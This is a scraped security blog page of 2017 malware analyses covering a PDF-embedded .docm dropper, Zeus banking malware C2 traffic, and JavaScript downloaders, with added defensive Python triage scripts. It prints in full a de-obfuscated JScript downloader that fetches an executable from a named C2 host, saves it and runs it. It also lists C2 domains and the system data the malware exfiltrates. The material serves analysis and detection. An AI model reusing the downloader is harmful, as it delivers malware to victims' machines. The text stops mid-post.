<a href="https://3.bp.blogspot.com/-w-8BICNmwnQ/WQGx5F_TqeI/AAAAAAAAAFY/qVVZ74AFozIVkfvDyi734Iy-pOoPX5m9QCLcB/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B5.34.20%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="199" src="https://3.bp.blogspot.com/-w-8BICNmwnQ/WQGx5F_TqeI/AAAAAAAAAFY/qVVZ74AFozIVkfvDyi734Iy-pOoPX5m9QCLcB/s320/Screen%2BShot%2B2017-04-27%2Bat%2B5.34.20%2Bpm.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: start;">The PDF has the code for the embedded docm:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div style="text-align: left;">
<a href="https://1.bp.blogspot.com/-EeRj5Eshj4k/WQGyAYqA88I/AAAAAAAAAFc/HV6B7JcQyHMLFjwtAoe00Dg7GRRM5K7iQCLcB/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B5.34.49%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="314" src="https://1.bp.blogspot.com/-EeRj5Eshj4k/WQGyAYqA88I/AAAAAAAAAFc/HV6B7JcQyHMLFjwtAoe00Dg7GRRM5K7iQCLcB/s320/Screen%2BShot%2B2017-04-27%2Bat%2B5.34.49%2Bpm.png" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://4.bp.blogspot.com/-6tRk1o34JUc/WQGyHFQebcI/AAAAAAAAAFg/XjfoqBXpMaMjJVKkLYRLfv5vLjU3Y0mwwCLcB/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B5.35.07%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://4.bp.blogspot.com/-6tRk1o34JUc/WQGyHFQebcI/AAAAAAAAAFg/XjfoqBXpMaMjJVKkLYRLfv5vLjU3Y0mwwCLcB/s640/Screen%2BShot%2B2017-04-27%2Bat%2B5.35.07%2Bpm.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://2.bp.blogspot.com/-BqsBCKcLabw/WQGyJ6KI6zI/AAAAAAAAAFk/ORlPDQ7A3QAEBX3YuZzX66RyJlZSTrupwCLcB/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B5.35.07%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://2.bp.blogspot.com/-BqsBCKcLabw/WQGyJ6KI6zI/AAAAAAAAAFk/ORlPDQ7A3QAEBX3YuZzX66RyJlZSTrupwCLcB/s640/Screen%2BShot%2B2017-04-27%2Bat%2B5.35.07%2Bpm.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://3.bp.blogspot.com/-exRN7bZFHDc/WQGyKFEtpvI/AAAAAAAAAFs/n9XrbIjv7JACS3_bBoBFiN2dbu5g0GfpgCLcB/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B5.36.50%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="328" src="https://3.bp.blogspot.com/-exRN7bZFHDc/WQGyKFEtpvI/AAAAAAAAAFs/n9XrbIjv7JACS3_bBoBFiN2dbu5g0GfpgCLcB/s640/Screen%2BShot%2B2017-04-27%2Bat%2B5.36.50%2Bpm.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://3.bp.blogspot.com/-ihL7xV_3Hyc/WQGyLHMzQOI/AAAAAAAAAFw/-33IYE5C8mwaGjN3lozpH8qkuyCRmgErwCLcB/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B6.00.41%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="183" src="https://3.bp.blogspot.com/-ihL7xV_3Hyc/WQGyLHMzQOI/AAAAAAAAAFw/-33IYE5C8mwaGjN3lozpH8qkuyCRmgErwCLcB/s640/Screen%2BShot%2B2017-04-27%2Bat%2B6.00.41%2Bpm.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://4.bp.blogspot.com/-EeRj5Eshj4k/WQGyAYqA88I/AAAAAAAAAFc/YeesZAdTRZA-zt6upH1B2mQLMZ5v6Z7wwCEw/s1600/Screen%2BShot%2B2017-04-27%2Bat%2B5.34.49%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="628" src="https://4.bp.blogspot.com/-EeRj5Eshj4k/WQGyAYqA88I/AAAAAAAAAFc/YeesZAdTRZA-zt6upH1B2mQLMZ5v6Z7wwCEw/s640/Screen%2BShot%2B2017-04-27%2Bat%2B5.34.49%2Bpm.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I'll try to get another sample and see if I can get the doc off it and execute it for the complete analysis of this campaign. </div>
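As an added example (not the author's analysis tooling), the following Python scanner picks out the PDF to embedded .docm chain described above: it finds /EmbeddedFile objects, inflates the stream and checks whether the payload is a Word ZIP carrying a VBA project. The sample PDF, its fake .docm and the truncated "corrupt" variant are all constructed inline.

```python
"""Triage a PDF for an embedded .docm dropper.

Added example (not the author's tooling): scan the PDF's objects for
/EmbeddedFile streams, inflate FlateDecode'd ones and check whether the
bytes are an OOXML ZIP carrying a VBA project (word/vbaProject.bin), i.e.
the PDF -> .docm -> downloader chain from the post.  The sample PDF,
including a truncated variant mimicking the corrupt attachment, is constructed.
"""
import io
import re
import zipfile
import zlib

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj(.*?)endobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalise_names(data):
    """Undo PDF name escapes so /Emb#65ddedFile is seen as /EmbeddedFile."""
    return HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def extract_embedded_files(pdf_bytes):
    """Yield (object number, payload bytes, error) for every /EmbeddedFile object.
    An object whose 'endobj' was cut off (truncated download) never matches
    OBJ_RE; triage_pdf() still counts its /EmbeddedFile marker separately.
    """
    for m in OBJ_RE.finditer(pdf_bytes):
        objnum, body = int(m.group(1)), m.group(3)
        header = normalise_names(body.split(b"stream", 1)[0])
        if b"/EmbeddedFile" not in header:
            continue
        sm = STREAM_RE.search(body)
        if sm is None:
            yield objnum, b"", "object has no stream data"
            continue
        raw = sm.group(1)
        if b"/FlateDecode" in header:
            try:
                raw = zlib.decompress(raw)
            except zlib.error as exc:
                yield objnum, raw, "FlateDecode failed: %s" % exc
                continue
        yield objnum, raw, None


def classify_payload(data):
    """Label embedded bytes as docm, ooxml, zip, pe or unknown."""
    if data[:2] == b"MZ":
        return "pe"
    if data[:2] != b"PK":
        return "unknown"
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = set(zf.namelist())
    except zipfile.BadZipFile:
        return "zip (corrupt or truncated)"
    if "word/vbaProject.bin" in names:
        return "docm"  # Word document carrying a VBA project: macro-enabled
    return "ooxml" if "[Content_Types].xml" in names else "zip"


def triage_pdf(pdf_bytes):
    """Summarise dropper indicators; the counts work even if object parsing fails."""
    norm = normalise_names(pdf_bytes)
    return {
        "embedded_file_markers": norm.count(b"/EmbeddedFile"),
        "has_javascript": b"/JavaScript" in norm or b"/JS" in norm,
        "has_openaction": b"/OpenAction" in norm,
        "findings": [
            {"object": n, "kind": classify_payload(d) if d else None, "error": e}
            for n, d, e in extract_embedded_files(pdf_bytes)
        ],
    }


def build_sample_pdf(truncate=False):
    """Construct a minimal invoice PDF carrying a fake .docm (demo data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 64)  # OLE magic only
    stream = zlib.compress(buf.getvalue())
    pdf = (
        b"%PDF-1.7\n"
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R"
        b" /OpenAction << /S /JavaScript /JS (/* opens the attachment */) >> >>\nendobj\n"
        b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
        b"3 0 obj\n<< /Type /Filespec /F (invoice.docm) /EF << /F 4 0 R >> >>\nendobj\n"
        b"4 0 obj\n<< /Type /Emb#65ddedFile /Filter /FlateDecode /Length "
        + str(len(stream)).encode() + b" >>\nstream\n" + stream
        + b"\nendstream\nendobj\ntrailer\n<< /Root 1 0 R >>\n%%EOF\n"
    )
    if truncate:  # cut inside the embedded stream, like the corrupt sample in the post
        pdf = pdf[: pdf.index(b"stream\n", pdf.index(b"4 0 obj")) + 40]
    return pdf
```

On the truncated variant the object parser finds nothing, but the /EmbeddedFile marker count still flags the file, which is why the triage keeps both signals.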
<br />
2017-04-26 | Malware - Zeus | Apr 2017<br />
<div>
<span style="font-family: open sans, sans-serif;">Here are some of the characteristics of a current version of the Zeus banking malware.</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">Upon execution, the sample spawns an explorer.exe process, which then carries out the actual work.</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-zVUDrdc4xjQ/WP2LsbcLL7I/AAAAAAAAMtE/uuQrQ5UKrA8_jNrnEwO5rRF0jQKmRU2gACLcB/s1600/Screen%2BShot%2B2017-04-24%2Bat%2B3.20.08%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="131" src="https://2.bp.blogspot.com/-zVUDrdc4xjQ/WP2LsbcLL7I/AAAAAAAAMtE/uuQrQ5UKrA8_jNrnEwO5rRF0jQKmRU2gACLcB/s640/Screen%2BShot%2B2017-04-24%2Bat%2B3.20.08%2Bpm.png" width="640" /></a></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: open sans, sans-serif;">PDB files (from memory, not all are created by the malware):</span></h3>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: open sans, sans-serif;">C2 information:</span></h3>
<div>
<span style="font-family: "open sans", sans-serif;">Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)</span></div>
<div>
<span style="font-family: open sans, sans-serif;">HTTP/1.1</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Connection: close</span></div>
<div>
<span style="font-family: open sans, sans-serif;">urlmon.dll</span></div>
<div>
<span style="font-family: open sans, sans-serif;">ObtainUserAgentString</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">HTTP connections:</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-da_ci2cAynA/WP2LyF2GScI/AAAAAAAAMtQ/SDwanMWDpHUp8qNtzn0pHKt-zeSe44dyQCEw/s1600/Screen%2BShot%2B2017-04-24%2Bat%2B3.04.06%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="166" src="https://2.bp.blogspot.com/-da_ci2cAynA/WP2LyF2GScI/AAAAAAAAMtQ/SDwanMWDpHUp8qNtzn0pHKt-zeSe44dyQCEw/s640/Screen%2BShot%2B2017-04-24%2Bat%2B3.04.06%2Bpm.png" width="640" /></a></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">http://health.worldwidecons.ltd/index.php</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko</span></div>
<div>
<span style="font-family: open sans, sans-serif;">health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;">/index.php</span></div>
<div>
<span style="font-family: open sans, sans-serif;">C:\Windows\System32\rasadhlp.dll</span></div>
<div>
<span style="font-family: open sans, sans-serif;">LRPC-4ad3f41e1dd17fdfd8</span></div>
<div>
<span style="font-family: open sans, sans-serif;">LRPC-ce28dc8b8c59856b80</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Accept: */*</span></div>
<div>
<span style="font-family: open sans, sans-serif;">UserName</span></div>
<div>
<span style="font-family: open sans, sans-serif;">POST /index.php HTTP/1.1</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Host: health.worldwidecons.ltd</span></div>
<div>
<span style="font-family: open sans, sans-serif;">qqqqqqqqqqqqqqqq</span></div>
<div>
<span style="font-family: open sans, sans-serif;">dtl.snocediwdlrow.htlaeh</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: open sans, sans-serif;">System info sent back to the C2:</span></h3>
<div>
<span style="font-family: "open sans", sans-serif;">ALLUSERSPROFILE=C:\ProgramData</span></div>
<div>
<span style="font-family: open sans, sans-serif;">APPDATA=C:\Users\User\AppData\Roaming</span></div>
<div>
<span style="font-family: open sans, sans-serif;">CommonProgramFiles=C:\Program Files\Common Files</span></div>
<div>
<span style="font-family: open sans, sans-serif;">COMPUTERNAME=WIN-P63U3EMH5QC</span></div>
<div>
<span style="font-family: open sans, sans-serif;">ComSpec=C:\Windows\system32\cmd.exe</span></div>
<div>
<span style="font-family: open sans, sans-serif;">FP_NO_HOST_CHECK=NO</span></div>
<div>
<span style="font-family: open sans, sans-serif;">HOMEDRIVE=C:</span></div>
<div>
<span style="font-family: open sans, sans-serif;">HOMEPATH=\Users\User</span></div>
<div>
<span style="font-family: open sans, sans-serif;">LOCALAPPDATA=C:\Users\User\AppData\Local</span></div>
<div>
<span style="font-family: open sans, sans-serif;">LOGONSERVER=\\WIN-P63U3EMH5QC</span></div>
<div>
<span style="font-family: open sans, sans-serif;">NUMBER_OF_PROCESSORS=1</span></div>
<div>
<span style="font-family: open sans, sans-serif;">OS=Windows_NT</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\</span></div>
<div>
<span style="font-family: open sans, sans-serif;">PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC</span></div>
<div>
<span style="font-family: open sans, sans-serif;">PROCESSOR_ARCHITECTURE=x86</span></div>
<div>
<span style="font-family: open sans, sans-serif;">PROCESSOR_IDENTIFIER=x86 Family 6 Model 70 Stepping 1, GenuineIntel</span></div>
<div>
<span style="font-family: open sans, sans-serif;">PROCESSOR_LEVEL=6</span></div>
<div>
<span style="font-family: open sans, sans-serif;">PROCESSOR_REVISION=4601</span></div>
<div>
<span style="font-family: open sans, sans-serif;">ProgramData=C:\ProgramData</span></div>
<div>
<span style="font-family: open sans, sans-serif;">ProgramFiles=C:\Program Files</span></div>
<div>
<span style="font-family: open sans, sans-serif;">PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\</span></div>
<div>
<span style="font-family: open sans, sans-serif;">PUBLIC=C:\Users\Public</span></div>
<div>
<span style="font-family: open sans, sans-serif;">SESSIONNAME=Console</span></div>
<div>
<span style="font-family: open sans, sans-serif;">SystemDrive=C:</span></div>
<div>
<span style="font-family: open sans, sans-serif;">SystemRoot=C:\Windows</span></div>
<div>
<span style="font-family: open sans, sans-serif;">TEMP=C:\Users\User~1\AppData\Local\Temp</span></div>
<div>
<span style="font-family: open sans, sans-serif;">TMP=C:\Users\User~1\AppData\Local\Temp</span></div>
<div>
<span style="font-family: open sans, sans-serif;">USERDOMAIN=WIN-P63U3EMH5QC</span></div>
<div>
<span style="font-family: open sans, sans-serif;">USERDOMAIN_ROAMINGPROFILE=WIN-P63U3EMH5QC</span></div>
<div>
<span style="font-family: open sans, sans-serif;">USERNAME=User</span></div>
<div>
<span style="font-family: open sans, sans-serif;">USERPROFILE=C:\Users\User</span></div>
<div>
<span style="font-family: open sans, sans-serif;">windir=C:\Windows</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: open sans, sans-serif;">Misc information (can be used as IOCs):</span></h3>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-fY3uumOeNBM/WP2LsSE_AAI/AAAAAAAAMtM/mcPcTqnaJh0Rb-HuKDb-OCjDmgAKXt15QCEw/s1600/Screen%2BShot%2B2017-04-24%2Bat%2B3.10.38%2Bpm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="254" src="https://4.bp.blogspot.com/-fY3uumOeNBM/WP2LsSE_AAI/AAAAAAAAMtM/mcPcTqnaJh0Rb-HuKDb-OCjDmgAKXt15QCEw/s640/Screen%2BShot%2B2017-04-24%2Bat%2B3.10.38%2Bpm.png" width="640" /></a></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">Cookie:username@windowssearch.com/</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Cookie:username@wireshark.org/</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">Connection: close</span></div>
<div>
<span style="font-family: open sans, sans-serif;">X-Powered-By: PHP/5.4.45-0+deb7u2</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<h3>
<span style="font-family: open sans, sans-serif;">Websites targeted</span></h3>
<div>
<span style="font-family: open sans, sans-serif;">The list is very long - they are not leaving any industry out!</span></div>
<div>
<span style="font-family: open sans, sans-serif;">Here's just one snippet:</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">Here's one of the de-obfuscated downloader scripts, by the way:</span></div>
<div>
<span style="font-family: open sans, sans-serif;"><br /></span></div>
<div>
<span style="font-family: open sans, sans-serif;">The code below is the part that grabs the payload from the C2 and executes it.</span></div>
<pre>
// Objects used by the downloader: WScript.Shell for folder lookups, Shell.Application
// to launch the dropped file, XMLHTTP for the download, ADODB.Stream to write the bytes.
var wsh = new ActiveXObject("wscript.shell");
var sh = new ActiveXObject("shell.application");
var HTTP = new ActiveXObject("MSXML2.XMLHTTP");
var Stream = new ActiveXObject("ADODB.Stream");

// Drop path: a random numeric file name with an .exe extension in the user's Templates folder.
var path = wsh.SpecialFolders("Templates") + "\\" + ((Math.random() * 999999) + 9999 | 0) + ".exe";

// Fetch the payload synchronously from the C2; on HTTP 200 write it to disk and run it.
HTTP.Open("GET", "http://forum.glotran.club/rXKAdoWqgi.php", false);
HTTP.Send();
if (HTTP.Status == 200) {
    Stream.Open();
    Stream.Type = 1;                  // adTypeBinary
    Stream.Write(HTTP.ResponseBody);
    Stream.Position = 0;
    Stream.SaveToFile(path, 2);       // adSaveCreateOverWrite
    Stream.Close();
    sh.ShellExecute(path, "", "", "open", 1);
}
</pre>
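An added example (not the author's tooling): a static triage pass in Python over the de-obfuscated script above. It never runs the script; it extracts the COM ProgIDs, URL, drop folder, dropped-file extension and execution call that make up the download, write, execute chain, and maps the WScript SpecialFolders name onto the on-disk path a file-create detection should watch. The ROLE_BY_PROGID and SPECIAL_FOLDER_PATHS tables are my own, and the CSIDL paths are the standard Vista-and-later locations.

```python
"""Static triage of a WSH/JScript downloader (added example, not the author's tooling).

Nothing here executes the script.  It pulls out the COM ProgIDs, URLs, drop
folder, dropped-file extension and execution call that form the
download -> write -> execute chain, and translates the WScript SpecialFolders
name into the path a file-create detection should watch.
SAMPLE_SCRIPT is the de-obfuscated downloader quoted in the post.
"""
import re

SAMPLE_SCRIPT = r'''
var wsh = new ActiveXObject("wscript.shell");
var sh = new ActiveXObject("shell.application");
var HTTP = new ActiveXObject("MSXML2.XMLHTTP");
var Stream = new ActiveXObject("ADODB.Stream");
var path = wsh.SpecialFolders("Templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
HTTP.Open("GET", "http://forum.glotran.club/rXKAdoWqgi.php", false); HTTP.Send(); if (HTTP.Status == 200) {
Stream.Open(); Stream.Type = 1; Stream.Write(HTTP.ResponseBody);
Stream.Position = 0; Stream.SaveToFile(path, 2);
Stream.Close(); sh.ShellExecute(path, "", "", "open", 1); }
'''

# ProgIDs commonly chained by script downloaders and the role each one plays (my table).
ROLE_BY_PROGID = {
    "wscript.shell": "shell/env access",
    "shell.application": "execution",
    "msxml2.xmlhttp": "http download",
    "msxml2.serverxmlhttp": "http download",
    "microsoft.xmlhttp": "http download",
    "adodb.stream": "binary write to disk",
    "scripting.filesystemobject": "file system access",
}
# Where WScript.Shell.SpecialFolders resolves these names on Vista and later.
SPECIAL_FOLDER_PATHS = {
    "templates": r"%APPDATA%\Microsoft\Windows\Templates",
    "appdata": r"%APPDATA%",
    "startup": r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup",
    "desktop": r"%USERPROFILE%\Desktop",
}

ACTIVEX_RE = re.compile(r"new\s+ActiveXObject\s*\(\s*[\"']([^\"']+)[\"']\s*\)", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
SPECIAL_FOLDER_RE = re.compile(r"SpecialFolders\s*\(\s*[\"']([^\"']+)[\"']\s*\)", re.I)
EXT_RE = re.compile(r"[\"'](\.[a-z0-9]{2,4})[\"']", re.I)   # quoted extension literals like ".exe"
SAVE_RE = re.compile(r"\.SaveToFile\s*\(", re.I)
EXEC_RE = re.compile(r"\.(ShellExecute|Run|Exec)\s*\(", re.I)


def triage_script(text):
    """Return the indicators found in a script and whether the full dropper chain is present."""
    progids = sorted({p.lower() for p in ACTIVEX_RE.findall(text)})
    roles = {ROLE_BY_PROGID.get(p, "unknown") for p in progids}
    report = {
        "progids": progids,
        "urls": sorted(set(URL_RE.findall(text))),
        "drop_folders": sorted(set(SPECIAL_FOLDER_RE.findall(text))),
        "dropped_extensions": sorted({e.lower() for e in EXT_RE.findall(text)}),
        "writes_file": bool(SAVE_RE.search(text)),
        "executes": sorted({m.lower() for m in EXEC_RE.findall(text)}),
        "random_filename": bool(re.search(r"Math\.random\s*\(", text)),
    }
    # The classic dropper shape: fetch over HTTP, write the bytes to disk, launch them.
    report["download_write_execute_chain"] = (
        "http download" in roles and report["writes_file"] and bool(report["executes"])
    )
    return report


def hunting_paths(report):
    """Translate SpecialFolders names into path globs for a file-create rule."""
    exts = report["dropped_extensions"] or [""]
    return [
        SPECIAL_FOLDER_PATHS.get(folder.lower(), folder) + "\\*" + ext
        for folder in report["drop_folders"]
        for ext in exts
    ]
```

For this sample the hunt reduces to wscript.exe or cscript.exe creating *.exe under %APPDATA%\Microsoft\Windows\Templates followed by a process start from that path.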
<div>
<br /></div>
2017-04-26 | Malware - JS Downloaders: Amazon Delivery Theme | APR 2017<br />
<span style="background-color: white; color: #292929; font-family: Lora, serif; font-size: 20px;">This is one of the more interesting JS downloaders that I've come across recently. The fact that it downloads another script that carries out the final download of the payload is different from what we normally see. As to why exactly it is doing that, I'm not sure. Just an extra layer.</span><br />
<div style="background-color: white; color: #292929; font-family: Lora, serif; font-size: 20px;">
The code in the second download is encrypted by a running XOR and is decrypted on execution. The following shots describe the flow of the campaign.<br /><br />I've included the text versions of the interesting parts from the scripts, with comments, at the end of the post.<br /><br />This is a screenshot of the first stage JS code - that, quite literally, downloads another JS file and then executes it to get the payload.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="border-collapse: collapse; border-spacing: 0px; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="padding: 0px;"><a href="http://3.bp.blogspot.com/-Zk4VUqs3bHE/WPf8AOp9p9I/AAAAAAAAMrM/ApUoOHwx1-si7BODO3iwHOveQCnA0gF7gCK4B/s1600/first_stage_JS.png" imageanchor="1" style="background: transparent; clear: left; color: #25a186; cursor: pointer; display: inline-block; margin-bottom: 1em; margin-left: auto; margin-right: auto; text-decoration-line: none;"><img border="0" height="188" src="https://3.bp.blogspot.com/-Zk4VUqs3bHE/WPf8AOp9p9I/AAAAAAAAMrM/ApUoOHwx1-si7BODO3iwHOveQCnA0gF7gCK4B/s640/first_stage_JS.png" style="border: 0px; height: auto; max-width: 100%;" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="padding: 0px;"><span style="font-size: x-small;">First Stage JS</span></td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="border-collapse: collapse; border-spacing: 0px; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="padding: 0px;"><div style="text-align: justify;">
<span style="text-align: left;">Below is the 'beautified' version of the same code above.</span></div>
<div style="text-align: left;">
<br /></div>
<a href="http://1.bp.blogspot.com/-f5stWeMGy64/WPgFZ1wzadI/AAAAAAAAMrc/2soLDSKiHR869JFHmbBVt5KJhouIU4PiwCK4B/s1600/first_stage_JS_beautified.png" imageanchor="1" style="background: transparent; color: #25a186; cursor: pointer; display: inline-block; margin-left: auto; margin-right: auto; text-decoration-line: none;"><img border="0" height="224" src="https://1.bp.blogspot.com/-f5stWeMGy64/WPgFZ1wzadI/AAAAAAAAMrc/2soLDSKiHR869JFHmbBVt5KJhouIU4PiwCK4B/s640/first_stage_JS_beautified.png" style="border: 0px; height: auto; max-width: 100%;" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="padding: 0px;"><span style="font-size: x-small;">First Stage Beautified</span><br /><span style="font-size: x-small;"><br /></span><br /><div style="text-align: left;">
<span style="font-size: x-small;">So below is the output of the selected code that I modified a bit and printed out using the 'console.log' method: </span></div>
</td></tr>
</tbody></table>
<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="border-collapse: collapse; border-spacing: 0px; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="padding: 0px;"><a href="http://1.bp.blogspot.com/-YDDVDHh6Ds8/WPgFeVZ1XFI/AAAAAAAAMrk/lUglGLETCfMCHB-sycZH15qoG9pYOA_pACK4B/s1600/first_stage_debug.png" imageanchor="1" style="background: transparent; color: #25a186; cursor: pointer; display: inline-block; margin-left: auto; margin-right: auto; text-decoration-line: none;"><img border="0" height="152" src="https://1.bp.blogspot.com/-YDDVDHh6Ds8/WPgFeVZ1XFI/AAAAAAAAMrk/lUglGLETCfMCHB-sycZH15qoG9pYOA_pACK4B/s640/first_stage_debug.png" style="border: 0px; height: auto; max-width: 100%;" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="padding: 0px;"><span style="font-size: x-small;">First Stage Debugging</span></td></tr>
</tbody></table>
<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="border-collapse: collapse; border-spacing: 0px; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="padding: 0px;"><div style="text-align: left;">
Executing the modified code gives us the URLs for the second-stage JS script:</div>
<a href="http://2.bp.blogspot.com/-YnLzfOLpFW0/WPgGXMHPUTI/AAAAAAAAMrw/dL2Dnyz84Lgf31sQiBIgWRRGZISJ1fHIgCK4B/s1600/first_stage_results.png" imageanchor="1" style="background: transparent; color: #25a186; cursor: pointer; display: inline-block; margin-left: auto; margin-right: auto; text-decoration-line: none;"><img border="0" height="92" src="https://2.bp.blogspot.com/-YnLzfOLpFW0/WPgGXMHPUTI/AAAAAAAAMrw/dL2Dnyz84Lgf31sQiBIgWRRGZISJ1fHIgCK4B/s640/first_stage_results.png" style="border: 0px; height: auto; max-width: 100%;" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="padding: 0px;"><span style="font-size: x-small;">First Stage execution results</span></td></tr>
</tbody></table>
<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="border-collapse: collapse; border-spacing: 0px; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="padding: 0px;"><div style="text-align: left;">
The downloaded JS is saved in the user's profile directory and then executed:</div>
<a href="http://2.bp.blogspot.com/-Gzlqi7q7JVA/WPgG-xTgC2I/AAAAAAAAMr8/UlTZIVqOCCU9DuoiZyqe2deMUpmmzFqTgCK4B/s1600/second_stage_JS.png" imageanchor="1" style="background: transparent; color: #25a186; cursor: pointer; display: inline-block; margin-left: auto; margin-right: auto; text-decoration-line: none;"><img border="0" height="203" src="https://2.bp.blogspot.com/-Gzlqi7q7JVA/WPgG-xTgC2I/AAAAAAAAMr8/UlTZIVqOCCU9DuoiZyqe2deMUpmmzFqTgCK4B/s640/second_stage_JS.png" style="border: 0px; height: auto; max-width: 100%;" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="padding: 0px;"><span style="font-size: x-small;">Second Stage code</span></td></tr>
</tbody></table>
<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="border-collapse: collapse; border-spacing: 0px; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="padding: 0px;"><div style="text-align: left;">
